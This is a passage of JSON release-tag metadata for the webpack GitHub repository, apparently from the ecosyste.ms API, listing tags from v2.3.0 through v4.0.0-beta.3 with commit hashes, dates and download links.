null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@